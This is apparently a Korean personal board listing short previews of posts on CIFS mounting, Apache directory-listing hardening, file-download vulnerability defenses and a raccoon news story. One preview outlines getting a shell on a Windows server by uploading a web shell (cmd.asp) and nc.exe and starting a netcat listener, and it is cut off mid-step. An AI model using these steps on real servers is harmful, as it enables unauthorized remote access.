| | CIFS 설치
|
| Common Internet Filesystem
- 삼바 지원.
sudo apt-get install cifs-utils
mount.cifs //192.168.0.200/나의공유 ./tmp -o user=Administrator |
| |
공개
| 댓글: 0 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
| “나 좀 구해줄래?”…쓰레기통 빠진 라쿤 가족
|
| [서울신문 나우뉴스]”바쁘지 않으시면 저 좀 구해주실래요?”
대형 쓰레기통에 빠진 라쿤들의 사진이 언론에 보도돼 화제가 되고 있다. 사진 한장으로 사람들의 입가에 웃음을 짓게 만든 이 사진은 최근 미국 뉴욕의 한 대형 쓰레기통 속에서 촬영됐다.
사진 속 주인공은 바로 미국 너... |
| |
공개
| 댓글: 0 | 첨부파일: 1 |
등록자: jinsuk |
등록일:
|
| |
| | 디렉토리 파일 리스팅 제한 방법 - Apache
|
| 1. 아파치 설정파일인 httpd.conf 에서 DocumentRoot 또는 해당 디렉토리의 Options 항목에 Indexs 옵션을 삭제
2. 아파치 재시작 |
| |
공개
| 댓글: 0 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
| | 파일다운로드 취약점 보안 대책 - 절대경로(full path)
|
| 1. 서버의 다운로드 스크립트내에서 다운로드 가능한 디렉토리 목록을 설정한다.
2. 다운로드를 허용하기 전에 대상 파일의 절대경로(파일시스템 상의)를 생성한다.
3. 대상 파일이 허용 디렉토리 내부 파일이 아니면 거부한다.
JSP의 경우 절대경로는 getServletCo... |
| |
공개
| 댓글: 2 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
| | 윈도우 서버 쉘 따기: reverse telnet
|
| 1. 파일업로드 기능이 있는 웹쉘 업로드 (예를 들어 cmd.asp)
2. nc.exe 업로드
3. cmd.asp를 통해 nc.exe 경로확인 (dir /w /s \nc.exe)
- C:\InetPub\wwwroot\board\pds\nc.exe
4. 공격자: nc.exe -l ... |
| |
공개
| 댓글: 0 | 첨부파일: 0 |
등록자: jinsuk |
등록일:
|
| |
|
